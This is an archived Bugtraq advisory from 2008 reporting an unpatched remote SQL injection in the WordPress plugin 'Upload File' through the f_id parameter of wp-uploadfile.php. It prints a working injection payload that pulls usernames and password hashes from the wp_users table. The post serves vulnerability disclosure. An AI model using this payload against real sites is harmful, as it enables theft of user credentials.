<a href="http://g.adspeed.net/ad.php?do=clk&zid=14678&wd=728&ht=90&pair=as" target="_top"><img style="border:0px;" src="http://g.adspeed.net/ad.php?do=img&zid=14678&wd=728&ht=90&pair=as" alt="i" width="728" height="90"/></a>

Nmap Security Scanner

Docs
Security Lists

Full Disclosure

More
Security Tools

Packet crafters

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

edgeos

Bugtraq: vuln in WordPress plugin Upload File(UP)

vuln in WordPress plugin Upload File(UP)

From: <my_at_eserg.ru>
Date: 24 May 2008 06:53:21 -0000

('binary' encoding is not supported, stored as-is) New Advisory:
Wordpress Plugin Upload File(UP) Remote SQL Injection

--------------------Summary----------------
Software: Upload File (WordPress Plugin)
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
PoC/Exploit: Not Available
Solution: Not Available
Discovered by: eserg.ru

-----------------Description---------------
1. SQL Injection.

http://localhost/[path]/wp-uploadfile.php?f_id=[SQL]
SQL query:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*

--------------PoC/Exploit----------------------
Waiting for developer(s) reply.

--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Regards,
Belsec Team
http://eserg.ru
Received on May 24 2008

This message: [ Message body ]
Next message: admin_at_pcpin.com: "PCPIN Chat 6: potential XSS vulnerability in URL redirection script"
Previous message: sales_at_bosdev.com: "Re: BosNews v4.0 Remote add user admin"
Next in thread: none_at_none.com: "Re: vuln in WordPress plugin Upload File(UP)"
Maybe reply: none_at_none.com: "Re: vuln in WordPress plugin Upload File(UP)"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]

edgeos